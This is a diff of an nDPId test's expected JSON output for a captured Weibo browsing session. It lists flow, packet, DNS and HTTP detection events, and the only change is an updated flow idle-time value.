+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070086,"flow_last_seen":1463089070086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089070086,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1463089070086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070086,"pkt":"kDVu60UQeJKcD6iOCABFAAA0hxpAAEAGQw\/AqAFp2DrWTuRxAbtN5WEdhI1WjIAQAO065AAAAQEICgBBBst8MNbL"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1463089070131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070131,"pkt":"eJKcD6iOkDVu60UQCABFAAA0MLYAADMG5nPYOtZOwKgBaQG75HGEjVaMTeVhHoAQAV62dAAAAQEICnwxhr4AQNrV"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070755,"flow_last_seen":1463089070755,"flow_idle_time":180000,"flow_min_l4_payload_len":364,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1463089070755,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00927{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1463089070755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":406,"pkt_l4_len":372,"thread_ts_msec":1463089070755,"pkt":"kDVu60UQeJKcD6iOCABFAAGIMGNAAEARm9LAqAFp2DrS49GYAbsBdI1JDLva88\/LUhUgJJB9mYAGceDgbWxM0LRsm4JNDbKc2scH8met9koeqL6\/vSPRbc8Azif26oxDIgzQBvKXwSWqmW75DLc+Tze8HLmFOLbpW1dfDh+CmYIDg83ozCrqzZhIa7c9c87+9DDGInSDf9f\/tl92yy8f1zwi5ofEkbjAvQ14GM0UCN2FUqQXDuqOrr4+0mp4RLoTXyk0KmRSNOp96LQHThISJcaekcpsRADkvdkvWyfHzVzaPjpEHmDVGxlff0Lyt7xPlz4I3iJqFNYIv6S5IeCVHrZ+OTOUiQ654SUxByYukSwW968bKOypceOi6Z9YrJBsh8fbzBOlaaCscjkwvRlnA94hXGNPW\/f1uJBnwscXyRa1XQX3ylsU7+3wwIt8bcdzaqKvgasSUBwcjaznmyXm4EMkY0SocvpvlP+Y\/Tyw+d3\/Jt6j83TjDTmoWxIattwqrgJYlX1vanz3uVHuuTPizgrn3v70Ig=="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1463089070755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1463089070755,"pkt":"kDVu60UQeJKcD6iOCABFAAA5MGRAAEARnSDAqAFp2DrS49GYAbsAJVKhDLva88\/LUhUgJfyz0FFMX+goev2cGp67zKdIwHY="} 
@@ -19,63 +19,63 @@ 00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463089070841,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1463089070841,"pkt":"eJKcD6iOkDVu60UQCABFAABHAABAAEARtuvAqAEBwKgBaQA11swAM884smyBgAABAAEAAAAABXdlaWJvA2NvbQAAAQABwAwAAQABAAAAJAAEcoZQog=="} 00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA8BZVAAEAGr+3AqAFpcoZQoubvAFC9RQISAAAAAKACchCiVgAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA80EtAAEAG5TbAqAFpcoZQoubwAFDrBNfMAAAAAKACchCe2wAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071008,"flow_last_seen":1463089071008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071008,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1463089071008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071008,"pkt":"kDVu60UQeJKcD6iOCABFAAA8ct5AAEAGQqTAqAFpcoZQoubxAFC2vHVvAAAAAKACchA1VgAAAgQFtAQCCAoAQQexAAAAAAEDAwc="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071046,"flow_last_seen":1463089071046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1463089071046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0aeJAAEAGY8fAqAFp2DrSzolSAbv6shUXRZgnfoAQAcBJAQAAAQEICgBBB7tvXD+b"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071094,"pkt":"eJKcD6iOkDVu60UQCABFAAA0QjAAADYG1XnYOtLOwKgBaQG7iVJFmCd++rIVGIAQCVwVnQAAAQEICm9c76IAQIN7"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1463089071195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071195,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BcYAACkGBsVyhlCiwKgBaQBQ5u8JOZF4vUUCE4ASOQhvgQAAAgQFqAEBBAIBAwMH"} 
-00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1463089071195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071195,"pkt":"kDVu60UQeJKcD6iOCABFAAAoBZZAAEAGsADAqAFpcoZQoubvAFC9RQITCTmReVAQAOXoagAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071198,"pkt":"eJKcD6iOkDVu60UQCABFAAA0IcQAACoG6cZyhlCiwKgBaQBQ5vAZ6VqE6wTXzYASOQiSSgAAAgQFqAEBBAIBAwMH"} 
-00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071198,"pkt":"kDVu60UQeJKcD6iOCABFAAAo0ExAAEAG5UnAqAFpcoZQoubwAFDrBNfNGelahVAQAOULNAAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071348,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BccAACoGBcRyhlCiwKgBaQBQ5vFPiVnutrx1cIASOQjz5AAAAgQFqAEBBAIBAwMH"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071348,"pkt":"kDVu60UQeJKcD6iOCABFAAAoct9AAEAGQrfAqAFpcoZQoubxAFC2vHVwT4lZ71AQAOVszgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA8BZVAAEAGr+3AqAFpcoZQoubvAFC9RQISAAAAAKACchCiVgAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA80EtAAEAG5TbAqAFpcoZQoubwAFDrBNfMAAAAAKACchCe2wAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071008,"flow_last_seen":1463089071008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071008,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1463089071008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071008,"pkt":"kDVu60UQeJKcD6iOCABFAAA8ct5AAEAGQqTAqAFpcoZQoubxAFC2vHVvAAAAAKACchA1VgAAAgQFtAQCCAoAQQexAAAAAAEDAwc="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071046,"flow_last_seen":1463089071046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1463089071046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0aeJAAEAGY8fAqAFp2DrSzolSAbv6shUXRZgnfoAQAcBJAQAAAQEICgBBB7tvXD+b"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463089071094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071094,"pkt":"eJKcD6iOkDVu60UQCABFAAA0QjAAADYG1XnYOtLOwKgBaQG7iVJFmCd++rIVGIAQCVwVnQAAAQEICm9c76IAQIN7"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1463089071195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071195,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BcYAACkGBsVyhlCiwKgBaQBQ5u8JOZF4vUUCE4ASOQhvgQAAAgQFqAEBBAIBAwMH"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1463089071195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071195,"pkt":"kDVu60UQeJKcD6iOCABFAAAoBZZAAEAGsADAqAFpcoZQoubvAFC9RQITCTmReVAQAOXoagAA"} 
+00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071198,"pkt":"eJKcD6iOkDVu60UQCABFAAA0IcQAACoG6cZyhlCiwKgBaQBQ5vAZ6VqE6wTXzYASOQiSSgAAAgQFqAEBBAIBAwMH"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071198,"pkt":"kDVu60UQeJKcD6iOCABFAAAo0ExAAEAG5UnAqAFpcoZQoubwAFDrBNfNGelahVAQAOULNAAA"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071348,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BccAACoGBcRyhlCiwKgBaQBQ5vFPiVnutrx1cIASOQjz5AAAAgQFqAEBBAIBAwMH"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071348,"pkt":"kDVu60UQeJKcD6iOCABFAAAoct9AAEAGQrfAqAFpcoZQoubxAFC2vHVwT4lZ71AQAOVszgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463089071551,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1463089071551,"pkt":"kDVu60UQeJKcD6iOCABFAAA7Jz9AAEARj7jAqAFpwKgBARvsADUAJ8YJ26oBAAABAAAAAAAAA3d3dwV3ZWlibwNjb20AAAEAAQ=="} 
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463089071612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1463089071612,"pkt":"eJKcD6iOkDVu60UQCABFAACAAABAAEARtrLAqAEBwKgBaQA1G+wAbIVL26qBgAABAAMAAAAAA3d3dwV3ZWlibwNjb20AAAEAAcAMAAUAAQAAACUAGQN3d3cFd2VpYm8DY29tBWNkbmdjA25ldADAKwABAAEAAAAHAARdvIaJwCsAAQABAAAABwAEXbyGhw=="} 